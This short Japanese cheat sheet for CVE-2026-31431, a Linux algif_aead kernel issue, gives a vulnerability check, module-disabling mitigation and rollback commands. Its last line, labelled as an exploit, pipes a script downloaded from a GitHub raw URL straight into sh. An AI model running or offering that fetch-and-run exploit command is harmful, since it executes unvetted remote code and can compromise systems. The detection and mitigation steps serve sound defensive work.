テスト、パッチ、修正: CVE-2026-31431
# テスト:脆弱性の確認
python3 -c 'import socket;exec("try:s=socket.socket(socket.AF_ALG,socket.SOCK_SEQPACKET,0);s.bind((\"aead\",\"authencesn(hmac(sha256),cbc(aes))\"));print(\"vulnerable\")\nexcept:print(\"not vulnerable\")")'
# モジュールの確認
# カーネルにモジュールがロードされているか確認
lsmod | grep -q '^algif_aead' && echo "loaded" || echo "not loaded"
# 修正:モジュールの削除
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead 2>/dev/null || true
# ロールバック:モジュールの再ロード
sudo rm -f /etc/modprobe.d/disable-algif.conf
sudo depmod -a
エクスプロイト
# エクスプロイト
curl https://raw.githubusercontent.com/studiogangster/CVE-2026-31431/refs/heads/main/test.sh | sh